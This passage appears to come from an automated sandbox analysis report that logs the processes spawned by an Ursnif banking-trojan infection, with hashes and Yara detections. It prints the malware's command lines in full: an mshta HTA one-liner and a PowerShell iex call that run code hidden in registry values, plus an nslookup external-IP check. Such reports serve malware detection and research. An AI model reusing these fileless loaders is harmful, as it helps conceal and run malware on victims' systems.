                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:13:33:42
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                            Imagebase:0x7ff7f60f0000
                                                                                                                                            File size:823560 bytes
                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:13:33:43
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17410 /prefetch:2
                                                                                                                                            Imagebase:0x1210000
                                                                                                                                            File size:822536 bytes
                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

Start time: 13:33:47
Start date: 20/11/2020
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17422 /prefetch:2
Imagebase: 0x1210000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:33:53
Start date: 20/11/2020
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17428 /prefetch:2
Imagebase: 0x1210000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:34:00
Start date: 20/11/2020
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase: 0x7ff61ad00000
File size: 14848 bytes
MD5 hash: 197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 13:34:02
Start date: 20/11/2020
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase: 0x7ff785e30000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 13:34:02
Start date: 20/11/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:34:13
Start date: 20/11/2020
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
Imagebase: 0x7ff67a530000
File size: 2739304 bytes
MD5 hash: B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

General

Start time: 13:34:14
Start date: 20/11/2020
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP'
Imagebase: 0x7ff6cf4b0000
File size: 47280 bytes
MD5 hash: 33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 13:34:17
Start date: 20/11/2020
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
Imagebase: 0x7ff67a530000
File size: 2739304 bytes
MD5 hash: B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

General

Start time: 13:34:18
Start date: 20/11/2020
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP'
Imagebase: 0x7ff6cf4b0000
File size: 47280 bytes
MD5 hash: 33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 13:34:21
Start date: 20/11/2020
Path: C:\Windows\System32\control.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\control.exe -h
Imagebase: 0x7ff76ba10000
File size: 117760 bytes
MD5 hash: 625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 13:34:24
Start date: 20/11/2020
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase: 0x7ff6b7e60000
File size: 69632 bytes
MD5 hash: 73C519F050C20580F8A62C849D49215A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:34:27
Start date: 20/11/2020
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, Author: Joe Security

General

Start time: 13:34:38
Start date: 20/11/2020
Path: C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6883e0000
File size: 99272 bytes
MD5 hash: C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, Author: Joe Security

General

Start time: 13:34:42
Start date: 20/11/2020
Path: C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6883e0000
File size: 99272 bytes
MD5 hash: C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, Author: Joe Security

General

Start time: 13:34:43
Start date: 20/11/2020
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A736.bi1'
Imagebase: 0x7ff77d8b0000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Disassembly

Code Analysis
